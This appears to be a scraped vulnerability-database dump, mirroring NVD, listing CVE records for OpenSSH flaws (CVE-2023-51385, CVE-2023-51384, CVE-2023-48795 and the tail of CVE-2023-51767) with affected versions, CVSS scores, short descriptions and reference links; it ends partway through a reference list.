"url": "http://www.openwall.com/lists/oss-security/2025/10/01/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/10/01/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-51767"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Technical Description"
],
"url": "https://arxiv.org/abs/2309.02545"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255850"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://github.com/openssh/openssh-portable/blob/8241b9c0529228b4b86d88b1a6076fb9f97e4a99/auth-passwd.c#L77"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://github.com/openssh/openssh-portable/blob/8241b9c0529228b4b86d88b1a6076fb9f97e4a99/monitor.c#L878"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20240125-0006/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://ubuntu.com/security/CVE-2023-51767"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2023-51385
Vulnerability from fkie_nvd - Published: 2023-12-18 19:15 - Updated: 2025-11-04 22:15| URL | Tags | ||
|---|---|---|---|
| cve@mitre.org | http://seclists.org/fulldisclosure/2024/Mar/21 | ||
| cve@mitre.org | http://www.openwall.com/lists/oss-security/2023/12/26/4 | Mailing List, Third Party Advisory | |
| cve@mitre.org | https://github.com/openssh/openssh-portable/commit/7ef3787c84b6b524501211b11a26c742f829af1a | Patch | |
| cve@mitre.org | https://lists.debian.org/debian-lts-announce/2023/12/msg00017.html | Mailing List, Third Party Advisory | |
| cve@mitre.org | https://security.gentoo.org/glsa/202312-17 | Third Party Advisory | |
| cve@mitre.org | https://security.netapp.com/advisory/ntap-20240105-0005/ | ||
| cve@mitre.org | https://support.apple.com/kb/HT214084 | ||
| cve@mitre.org | https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html | Third Party Advisory | |
| cve@mitre.org | https://www.debian.org/security/2023/dsa-5586 | Third Party Advisory | |
| cve@mitre.org | https://www.openssh.com/txt/release-9.6 | Release Notes | |
| cve@mitre.org | https://www.openwall.com/lists/oss-security/2023/12/18/2 | Mailing List, Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | http://seclists.org/fulldisclosure/2024/Mar/21 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2023/12/26/4 | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/10/07/1 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/10/12/1 | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/openssh/openssh-portable/commit/7ef3787c84b6b524501211b11a26c742f829af1a | Patch | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.debian.org/debian-lts-announce/2023/12/msg00017.html | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://security.gentoo.org/glsa/202312-17 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://security.netapp.com/advisory/ntap-20240105-0005/ | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://support.apple.com/kb/HT214084 | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.debian.org/security/2023/dsa-5586 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.openssh.com/txt/release-9.6 | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.openwall.com/lists/oss-security/2023/12/18/2 | Mailing List, Release Notes |
| Vendor | Product | Version | |
|---|---|---|---|
| openbsd | openssh | * | |
| debian | debian_linux | 10.0 | |
| debian | debian_linux | 11.0 | |
| debian | debian_linux | 12.0 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5308FBBB-F738-41C5-97A4-E40118E957CD",
"versionEndExcluding": "9.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:12.0:*:*:*:*:*:*:*",
"matchCriteriaId": "46D69DCC-AE4D-4EA5-861C-D60951444C6C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "In ssh in OpenSSH before 9.6, OS command injection might occur if a user name or host name has shell metacharacters, and this name is referenced by an expansion token in certain situations. For example, an untrusted Git repository can have a submodule with shell metacharacters in a user name or host name."
},
{
"lang": "es",
"value": "En ssh en OpenSSH anterior a 9.6, la inyecci\u00f3n de comandos del sistema operativo puede ocurrir si un nombre de usuario o nombre de host tiene metacaracteres de shell, y un token de expansi\u00f3n hace referencia a este nombre en ciertas situaciones. Por ejemplo, un repositorio Git que no es de confianza puede tener un subm\u00f3dulo con metacaracteres de shell en un nombre de usuario o nombre de host."
}
],
"id": "CVE-2023-51385",
"lastModified": "2025-11-04T22:15:56.047",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 2.5,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-12-18T19:15:08.773",
"references": [
{
"source": "cve@mitre.org",
"url": "http://seclists.org/fulldisclosure/2024/Mar/21"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/12/26/4"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "https://github.com/openssh/openssh-portable/commit/7ef3787c84b6b524501211b11a26c742f829af1a"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00017.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://security.gentoo.org/glsa/202312-17"
},
{
"source": "cve@mitre.org",
"url": "https://security.netapp.com/advisory/ntap-20240105-0005/"
},
{
"source": "cve@mitre.org",
"url": "https://support.apple.com/kb/HT214084"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2023/dsa-5586"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://www.openssh.com/txt/release-9.6"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Release Notes"
],
"url": "https://www.openwall.com/lists/oss-security/2023/12/18/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://seclists.org/fulldisclosure/2024/Mar/21"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/12/26/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/10/07/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/10/12/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/openssh/openssh-portable/commit/7ef3787c84b6b524501211b11a26c742f829af1a"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00017.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.gentoo.org/glsa/202312-17"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://security.netapp.com/advisory/ntap-20240105-0005/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://support.apple.com/kb/HT214084"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2023/dsa-5586"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://www.openssh.com/txt/release-9.6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Release Notes"
],
"url": "https://www.openwall.com/lists/oss-security/2023/12/18/2"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2023-51384
Vulnerability from fkie_nvd - Published: 2023-12-18 19:15 - Updated: 2024-11-21 08:37| URL | Tags | ||
|---|---|---|---|
| cve@mitre.org | http://seclists.org/fulldisclosure/2024/Mar/21 | Mailing List, Third Party Advisory | |
| cve@mitre.org | https://github.com/openssh/openssh-portable/commit/881d9c6af9da4257c69c327c4e2f1508b2fa754b | Patch, Third Party Advisory | |
| cve@mitre.org | https://security.netapp.com/advisory/ntap-20240105-0005/ | Third Party Advisory | |
| cve@mitre.org | https://support.apple.com/kb/HT214084 | Third Party Advisory | |
| cve@mitre.org | https://www.debian.org/security/2023/dsa-5586 | Third Party Advisory | |
| cve@mitre.org | https://www.openssh.com/txt/release-9.6 | Release Notes | |
| cve@mitre.org | https://www.openwall.com/lists/oss-security/2023/12/18/2 | Mailing List, Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | http://seclists.org/fulldisclosure/2024/Mar/21 | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/openssh/openssh-portable/commit/881d9c6af9da4257c69c327c4e2f1508b2fa754b | Patch, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://security.netapp.com/advisory/ntap-20240105-0005/ | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://support.apple.com/kb/HT214084 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.debian.org/security/2023/dsa-5586 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.openssh.com/txt/release-9.6 | Release Notes | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.openwall.com/lists/oss-security/2023/12/18/2 | Mailing List, Release Notes |
| Vendor | Product | Version | |
|---|---|---|---|
| openbsd | openssh | * | |
| debian | debian_linux | 11.0 | |
| debian | debian_linux | 12.0 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D91DE00B-AE34-46AC-A5B3-C40A4C1F4C17",
"versionEndExcluding": "9.6",
"versionStartIncluding": "8.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:12.0:*:*:*:*:*:*:*",
"matchCriteriaId": "46D69DCC-AE4D-4EA5-861C-D60951444C6C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "In ssh-agent in OpenSSH before 9.6, certain destination constraints can be incompletely applied. When destination constraints are specified during addition of PKCS#11-hosted private keys, these constraints are only applied to the first key, even if a PKCS#11 token returns multiple keys."
},
{
"lang": "es",
"value": "En ssh-agent en OpenSSH anterior a 9.6, ciertas restricciones de destino se pueden aplicar de forma incompleta. Cuando se especifican restricciones de destino durante la adici\u00f3n de claves privadas alojadas en PKCS#11, estas restricciones solo se aplican a la primera clave, incluso si un token PKCS#11 devuelve varias claves."
}
],
"id": "CVE-2023-51384",
"lastModified": "2024-11-21T08:37:59.780",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-12-18T19:15:08.720",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2024/Mar/21"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/openssh/openssh-portable/commit/881d9c6af9da4257c69c327c4e2f1508b2fa754b"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20240105-0005/"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://support.apple.com/kb/HT214084"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2023/dsa-5586"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://www.openssh.com/txt/release-9.6"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Release Notes"
],
"url": "https://www.openwall.com/lists/oss-security/2023/12/18/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2024/Mar/21"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/openssh/openssh-portable/commit/881d9c6af9da4257c69c327c4e2f1508b2fa754b"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20240105-0005/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://support.apple.com/kb/HT214084"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2023/dsa-5586"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://www.openssh.com/txt/release-9.6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Release Notes"
],
"url": "https://www.openwall.com/lists/oss-security/2023/12/18/2"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2023-48795
Vulnerability from fkie_nvd - Published: 2023-12-18 16:15 - Updated: 2025-11-04 22:155.9 (Medium) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N
| URL | Tags | ||
|---|---|---|---|
| cve@mitre.org | http://packetstormsecurity.com/files/176280/Terrapin-SSH-Connection-Weakening.html | Third Party Advisory, VDB Entry | |
| cve@mitre.org | http://seclists.org/fulldisclosure/2024/Mar/21 | Mailing List, Third Party Advisory | |
| cve@mitre.org | http://www.openwall.com/lists/oss-security/2023/12/18/3 | Mailing List | |
| cve@mitre.org | http://www.openwall.com/lists/oss-security/2023/12/19/5 | Mailing List | |
| cve@mitre.org | http://www.openwall.com/lists/oss-security/2023/12/20/3 | Mailing List, Mitigation | |
| cve@mitre.org | http://www.openwall.com/lists/oss-security/2024/03/06/3 | Mailing List | |
| cve@mitre.org | http://www.openwall.com/lists/oss-security/2024/04/17/8 | Mailing List | |
| cve@mitre.org | https://access.redhat.com/security/cve/cve-2023-48795 | Third Party Advisory | |
| cve@mitre.org | https://arstechnica.com/security/2023/12/hackers-can-break-ssh-channel-integrity-using-novel-data-corruption-attack/ | Press/Media Coverage | |
| cve@mitre.org | https://bugs.gentoo.org/920280 | Issue Tracking | |
| cve@mitre.org | https://bugzilla.redhat.com/show_bug.cgi?id=2254210 | Issue Tracking | |
| cve@mitre.org | https://bugzilla.suse.com/show_bug.cgi?id=1217950 | Issue Tracking | |
| cve@mitre.org | https://crates.io/crates/thrussh/versions | Release Notes | |
| cve@mitre.org | https://filezilla-project.org/versions.php | Release Notes | |
| cve@mitre.org | https://forum.netgate.com/topic/184941/terrapin-ssh-attack | Issue Tracking | |
| cve@mitre.org | https://git.libssh.org/projects/libssh.git/commit/?h=stable-0.10&id=10e09e273f69e149389b3e0e5d44b8c221c2e7f6 | Patch | |
| cve@mitre.org | https://github.com/NixOS/nixpkgs/pull/275249 | Release Notes | |
| cve@mitre.org | https://github.com/PowerShell/Win32-OpenSSH/issues/2189 | Issue Tracking | |
| cve@mitre.org | https://github.com/PowerShell/Win32-OpenSSH/releases/tag/v9.5.0.0p1-Beta | Release Notes | |
| cve@mitre.org | https://github.com/TeraTermProject/teraterm/commit/7279fbd6ef4d0c8bdd6a90af4ada2899d786eec0 | Patch | |
| cve@mitre.org | https://github.com/TeraTermProject/teraterm/releases/tag/v5.1 | Release Notes | |
| cve@mitre.org | https://github.com/advisories/GHSA-45x7-px36-x8w8 | Third Party Advisory | |
| cve@mitre.org | https://github.com/apache/mina-sshd/issues/445 | Issue Tracking | |
| cve@mitre.org | https://github.com/connectbot/sshlib/commit/5c8b534f6e97db7ac0e0e579331213aa25c173ab | Patch | |
| cve@mitre.org | https://github.com/connectbot/sshlib/compare/2.2.21...2.2.22 | Third Party Advisory | |
| cve@mitre.org | https://github.com/cyd01/KiTTY/issues/520 | Issue Tracking | |
| cve@mitre.org | https://github.com/drakkan/sftpgo/releases/tag/v2.5.6 | Release Notes | |
| cve@mitre.org | https://github.com/erlang/otp/blob/d1b43dc0f1361d2ad67601169e90a7fc50bb0369/lib/ssh/doc/src/notes.xml#L39-L42 | Patch | |
| cve@mitre.org | https://github.com/erlang/otp/releases/tag/OTP-26.2.1 | Release Notes | |
| cve@mitre.org | https://github.com/golang/crypto/commit/9d2ee975ef9fe627bf0a6f01c1f69e8ef1d4f05d | Patch | |
| cve@mitre.org | https://github.com/hierynomus/sshj/issues/916 | Issue Tracking | |
| cve@mitre.org | https://github.com/janmojzis/tinyssh/issues/81 | Issue Tracking | |
| cve@mitre.org | https://github.com/jtesta/ssh-audit/commit/8e972c5e94b460379fe0c7d20209c16df81538a5 | Patch | |
| cve@mitre.org | https://github.com/libssh2/libssh2/pull/1291 | Mitigation | |
| cve@mitre.org | https://github.com/mkj/dropbear/blob/17657c36cce6df7716d5ff151ec09a665382d5dd/CHANGES#L25 | Patch | |
| cve@mitre.org | https://github.com/mscdex/ssh2/commit/97b223f8891b96d6fc054df5ab1d5a1a545da2a3 | Patch | |
| cve@mitre.org | https://github.com/mwiede/jsch/compare/jsch-0.2.14...jsch-0.2.15 | Product | |
| cve@mitre.org | https://github.com/mwiede/jsch/issues/457 | Issue Tracking | |
| cve@mitre.org | https://github.com/mwiede/jsch/pull/461 | Release Notes | |
| cve@mitre.org | https://github.com/net-ssh/net-ssh/blob/2e65064a52d73396bfc3806c9196fc8108f33cd8/CHANGES.txt#L14-L16 | Patch | |
| cve@mitre.org | https://github.com/openssh/openssh-portable/commits/master | Patch | |
| cve@mitre.org | https://github.com/paramiko/paramiko/issues/2337 | Issue Tracking | |
| cve@mitre.org | https://github.com/proftpd/proftpd/blob/0a7ea9b0ba9fcdf368374a226370d08f10397d99/RELEASE_NOTES | Release Notes | |
| cve@mitre.org | https://github.com/proftpd/proftpd/blob/d21e7a2e47e9b38f709bec58e3fa711f759ad0e1/RELEASE_NOTES | Release Notes | |
| cve@mitre.org | https://github.com/proftpd/proftpd/blob/master/RELEASE_NOTES | Release Notes | |
| cve@mitre.org | https://github.com/proftpd/proftpd/issues/456 | Issue Tracking | |
| cve@mitre.org | https://github.com/rapier1/hpn-ssh/releases | Release Notes | |
| cve@mitre.org | https://github.com/ronf/asyncssh/blob/develop/docs/changes.rst | Release Notes | |
| cve@mitre.org | https://github.com/ronf/asyncssh/tags | Release Notes | |
| cve@mitre.org | https://github.com/ssh-mitm/ssh-mitm/issues/165 | Issue Tracking | |
| cve@mitre.org | https://github.com/warp-tech/russh/releases/tag/v0.40.2 | Release Notes | |
| cve@mitre.org | https://gitlab.com/libssh/libssh-mirror/-/tags | Release Notes | |
| cve@mitre.org | https://groups.google.com/g/golang-announce/c/-n5WqVC18LQ | Mailing List | |
| cve@mitre.org | https://groups.google.com/g/golang-announce/c/qA3XtxvMUyg | Mailing List | |
| cve@mitre.org | https://help.panic.com/releasenotes/transmit5/ | Release Notes | |
| cve@mitre.org | https://jadaptive.com/important-java-ssh-security-update-new-ssh-vulnerability-discovered-cve-2023-48795/ | Press/Media Coverage | |
| cve@mitre.org | https://lists.debian.org/debian-lts-announce/2023/12/msg00017.html | Mailing List | |
| cve@mitre.org | https://lists.debian.org/debian-lts-announce/2024/01/msg00013.html | Mailing List, Third Party Advisory | |
| cve@mitre.org | https://lists.debian.org/debian-lts-announce/2024/01/msg00014.html | Mailing List, Third Party Advisory | |
| cve@mitre.org | https://lists.debian.org/debian-lts-announce/2024/04/msg00016.html | Mailing List, Third Party Advisory | |
| cve@mitre.org | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/33XHJUB6ROFUOH2OQNENFROTVH6MHSHA/ | Mailing List, Third Party Advisory | |
| cve@mitre.org | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3CAYYW35MUTNO65RVAELICTNZZFMT2XS/ | Mailing List, Third Party Advisory | |
| cve@mitre.org | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3JIMLVBDWOP4FUPXPTB4PGHHIOMGFLQE/ | Mailing List, Third Party Advisory | |
| cve@mitre.org | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3YQLUQWLIHDB5QCXQEX7HXHAWMOKPP5O/ | Mailing List, Third Party Advisory | |
| cve@mitre.org | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6Y74KVCPEPT4MVU3LHDWCNNOXOE5ZLUR/ | Mailing List, Third Party Advisory | |
| cve@mitre.org | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/APYIXIQOVDCRWLHTGB4VYMAUIAQLKYJ3/ | Mailing List, Third Party Advisory | |
| cve@mitre.org | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BL5KTLOSLH2KHRN4HCXJPK3JUVLDGEL6/ | Mailing List, Third Party Advisory | |
| cve@mitre.org | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/C3AFMZ6MH2UHHOPIWT5YLSFV3D2VB3AC/ | Mailing List, Third Party Advisory | |
| cve@mitre.org | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CHHITS4PUOZAKFIUBQAQZC7JWXMOYE4B/ | Mailing List, Third Party Advisory | |
| cve@mitre.org | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/F7EYCFQCTSGJXWO3ZZ44MGKFC5HA7G3Y/ | Mailing List, Third Party Advisory | |
| cve@mitre.org | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HYEDEXIKFKTUJIN43RG4B7T5ZS6MHUSP/ | Mailing List, Third Party Advisory | |
| cve@mitre.org | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I724O3LSRCPO4WNVIXTZCT4VVRMXMMSG/ | Mailing List, Third Party Advisory | |
| cve@mitre.org | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KEOTKBUPZXHE3F352JBYNTSNRXYLWD6P/ | Mailing List, Third Party Advisory | |
| cve@mitre.org | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KMZCVGUGJZZVDPCVDA7TEB22VUCNEXDD/ | Mailing List, Third Party Advisory | |
| cve@mitre.org | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L5Y6MNNVAPIJSXJERQ6PKZVCIUXSNJK7/ | Mailing List, Third Party Advisory | |
| cve@mitre.org | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LZQVUHWVWRH73YBXUQJOD6CKHDQBU3DM/ | Mailing List, Third Party Advisory | |
| cve@mitre.org | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MKQRBF3DWMWPH36LBCOBUTSIZRTPEZXB/ | Vendor Advisory | |
| cve@mitre.org | https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QI3EHAHABFQK7OABNCSF5GMYP6TONTI7/ | Mailing List, Third Party Advisory | |
| cve@mitre.org | https://matt.ucc.asn.au/dropbear/CHANGES | Release Notes | |
| cve@mitre.org | https://nest.pijul.com/pijul/thrussh/changes/D6H7OWTTMHHX6BTB3B6MNBOBX2L66CBL4LGSEUSAI2MCRCJDQFRQC | Patch | |
| cve@mitre.org | https://news.ycombinator.com/item?id=38684904 | Issue Tracking | |
| cve@mitre.org | https://news.ycombinator.com/item?id=38685286 | Issue Tracking | |
| cve@mitre.org | https://news.ycombinator.com/item?id=38732005 | Issue Tracking | |
| cve@mitre.org | https://nova.app/releases/#v11.8 | Release Notes | |
| cve@mitre.org | https://oryx-embedded.com/download/#changelog | Release Notes | |
| cve@mitre.org | https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0002 | Third Party Advisory | |
| cve@mitre.org | https://roumenpetrov.info/secsh/#news20231220 | Release Notes | |
| cve@mitre.org | https://security-tracker.debian.org/tracker/CVE-2023-48795 | Vendor Advisory | |
| cve@mitre.org | https://security-tracker.debian.org/tracker/source-package/libssh2 | Vendor Advisory | |
| cve@mitre.org | https://security-tracker.debian.org/tracker/source-package/proftpd-dfsg | Vendor Advisory | |
| cve@mitre.org | https://security-tracker.debian.org/tracker/source-package/trilead-ssh2 | Issue Tracking | |
| cve@mitre.org | https://security.gentoo.org/glsa/202312-16 | Third Party Advisory | |
| cve@mitre.org | https://security.gentoo.org/glsa/202312-17 | Third Party Advisory | |
| cve@mitre.org | https://security.netapp.com/advisory/ntap-20240105-0004/ | Third Party Advisory | |
| cve@mitre.org | https://support.apple.com/kb/HT214084 | Third Party Advisory | |
| cve@mitre.org | https://thorntech.com/cve-2023-48795-and-sftp-gateway/ | Third Party Advisory | |
| cve@mitre.org | https://twitter.com/TrueSkrillor/status/1736774389725565005 | Press/Media Coverage | |
| cve@mitre.org | https://ubuntu.com/security/CVE-2023-48795 | Vendor Advisory | |
| cve@mitre.org | https://winscp.net/eng/docs/history#6.2.2 | Release Notes | |
| cve@mitre.org | https://www.bitvise.com/ssh-client-version-history#933 | Release Notes | |
| cve@mitre.org | https://www.bitvise.com/ssh-server-version-history | Release Notes | |
| cve@mitre.org | https://www.chiark.greenend.org.uk/~sgtatham/putty/changes.html | Release Notes | |
| cve@mitre.org | https://www.crushftp.com/crush10wiki/Wiki.jsp?page=Update | Release Notes | |
| cve@mitre.org | https://www.debian.org/security/2023/dsa-5586 | Issue Tracking | |
| cve@mitre.org | https://www.debian.org/security/2023/dsa-5588 | Issue Tracking | |
| cve@mitre.org | https://www.freebsd.org/security/advisories/FreeBSD-SA-23:19.openssh.asc | Release Notes | |
